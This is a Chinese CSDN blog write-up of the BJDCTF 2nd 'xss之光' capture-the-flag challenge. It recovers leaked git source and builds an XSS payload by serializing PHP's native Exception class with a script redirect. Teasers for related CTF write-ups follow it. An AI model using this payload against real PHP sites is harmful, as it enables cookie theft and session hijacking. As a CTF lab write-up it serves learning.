[BJDCTF 2nd]xss之光

最新推荐文章于 2022-05-10 15:29:29 发布

旸哥哥

最新推荐文章于 2022-05-10 15:29:29 发布

阅读量259

点赞数

分类专栏： CTF 文章标签： php xss

本文链接：https://blog.csdn.net/qq_45708109/article/details/108022592

版权

CTF 专栏收录该内容

20 篇文章 0 订阅

订阅专栏

1.git源码泄露

用githack提取源码：

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

2.构造序列化脚本

题目是XSS，构造一个XSS跳转脚本，
在这里插入图片描述通过参数传入，flag在cookie里

代码中没有给出类来，所以我们只能使用PHP的原生类来序列化构造XSS，具体文章可以看：http://blog.ydspoplar.top/2020/03/17/php%E5%8F%AF%E5%88%A9%E7%94%A8%E7%9A%84%E5%8E%9F%E7%94%9F%E7%B1%BB/这里我们用了Exception()原生类，进行了XSS跳转拿到了flag
php脚本:

<?php
$a = serialize(new Exception("<script>window.location.href='baidu.com'</script>"));
echo urlencode($a);

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

旸哥哥

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

[BJDCTF 2nd]xss之光 -wp

freerats的博客

08-04

505

打开容器就gungungun，其他啥也没有。扫目录扫出git泄露 <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 源码就这么短短三行。一开始还想着是不是其他地方还会泄露另一部分源码，但是没找到。参考其他wp才知道是利用php的原生类进行XSS 题目给的提示就是题目叫xss，说明需要xss。 echo unserialize($a); 可触发序列化中的魔术方法__toString Error 适用于php7版本 E

---------已搬运-------BUUCTF：[BJDCTF 2nd]xss之光 ------------ 反序列PHP原生类的应用 -----------git小操作

Zero_Adam的博客

02-25

280

目录：一、自己做：二、不足&&收获三、学习WP 一、自己做：就到源码泄露那里，而且我自己也不会git操作。。。 -<?php -$a = $_GET['yds_is_so_beautiful']; -echo unserialize($a); 二、不足&&收获进一步晓得了 PHP 反序列化中的原生类的应用 alert(1)不行的时候，多试试别的。什么弹cookie 啊。跳转网页啊。都试试三、学习WP 没有类的情况下，可以进行原生类反序列化参考文献：反序列化

参与评论您还未登录，请先登录后发表或查看评论

[BJDCTF 2nd]xss之光（利用php原生类进行XSS）

EC_Carrot的博客

12-29

550

前言文章所涉及的资料来自互联网整理和个人总结，意在于个人学习和经验汇总，如有什么地方侵权，请联系本人删除，谢谢！本文仅用于学习与交流，不得用于非法用途！知识点有关该题目的知识点，十分建议去看看这篇大佬的文章：https://blog.csdn.net/qq_45521281/article/details/105812056 当对象被当作一个字符串使用时候调用(不仅仅是echo的时候，比如file_exists()判断也会触发)：__toString 这里的原理就是利用__toString这个魔法方法

前端安全之XSS攻击

02-25

有人将XSS攻击分为三种，分别是：1.ReflectedXSS（基于反射的XSS攻击）2.StoredXSS（基于存储的XSS攻击）3.DOM-basedorlocalXSS（基于DOM或本地的XSS攻击）基于反射的XSS攻击，主要依靠站点服务端返回脚本，在客户端...

Web安全之XSS攻击与防御小结

02-23

恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。攻击者对含有漏洞的服务器发起XSS攻击（注入JS代码）。诱使受害者打开受到攻击...

利用php的原生类进行XSS（[BJDCTF 2nd]xss之光）

qq_45521281的博客

04-28

1635

文章目录基础知识__toString 文章围绕着一个问题，如果在代码审计中有反序列化点，但是在原本的代码中找不到pop链该如何？N1CTF有一个无pop链的反序列化的题目，其中就是找到php内置类来进行反序列化。基础知识首先还是来回顾一下序列化中的魔术方法，下面也将以此进行研究。当对象被创建的时候调用：__construct 当对象被销毁的时候调用：__destruct 当对象被当作一个字符...

2020/7/20 -[BJDCTF 2nd]xss之光 - git源码泄露、php原生类反序列化

抒情诗

07-20

600

又回来了，当初看不懂，现在看起来也很nb（Exception类没了解过）首先是个git源码泄露，开始用dirsearch扫的时候很快，但全是429，后来用了-s 延迟（单位：s）选项成功扫出.git泄露。亲自实验-s 0.5也可以，稍微快了点。用githack下载源码，index.php 内容如下所示 <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 说他是反序列化吧，我没见过这种形式的，也不太清楚；说他不是反序列化

BUUCTF-CISCN-华东北赛区Web-XSS

迷风小白

09-11

4576

XSS 拿到题目出现如下界面随便点击测试一下，发现需要注册登录，随即注册一个用户登录(admin用户不能注册）发现有投稿和反馈这两个页面可以操作结合标题再看看这两个页面，投稿页面是用来放XSS的，然后在反馈给管理员这样我们就能拿到管理员的cookie，因为这里是内网环境，所以只能去 http://xss.buuoj.cn 注册账号来接收cookie。经过测试发现提交的内容部分会被转义...

PHP反序列化原生类利用

Sentiment的博客

05-10

1820

前言之前对反序列化原生类进行过总结，但可能总结的方面不同，在ctf用到的很少，所以这里在对ctf常用原生类进行一次总结。原生类 php中内置很多原生的类，在CTF中常以echo new $a($b);这种形式出现，当看到这种关键字眼时，就要考虑本题是不是需要原生类利用了。先看下都有什么内置原生类 <?php $classes = get_declared_classes(); foreach ($classes as $class) { $methods = get_class_meth

BJDCTF 2nd菜鸡做题记录

bmth666的博客

03-25

3251

文章目录萌新赛做了一下web，感觉还没有入门，太难了吧，然后看大佬博客把能写的复现一下 [BJDCTF 2nd]简单注入这道题没写出来，想了好久才想到可以用\转义掉'，然后就开始盲注，发现禁用了select，尝试绕过未果，卡死，看师傅文章才发现可以正则匹配出password，妙呀，先写一下我的思路 username=\ password=...

BJDCTF 2nd WEB

A_dmin的博客

03-24

7655

BJDCTF 2nd WEB emmm，比赛做了几道题，赛后官方给了wp，把没做出来的复现一下，，，， [BJDCTF 2nd]fake google 一个SSTI，发现是jinja2的，直接用payload打就行： {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='_IterationGuard' %...

[BJDCTF 2nd] WEB 简单题汇总

SopRomeo的博客

03-26

3129

Web简单题复现[BJDCTF 2nd]fake google在这里插入图片描述经过测试，存在xss和模板注入，这题是模板注入 [参考文献](https://xz.aliyun.com/t/3679)[BJDCTF 2nd]old-hack[BJDCTF 2nd]duangShell[BJDCTF 2nd]简单注入方法一:方法二:方法三：[BJDCTF 2nd]Schrödinger[BJDC...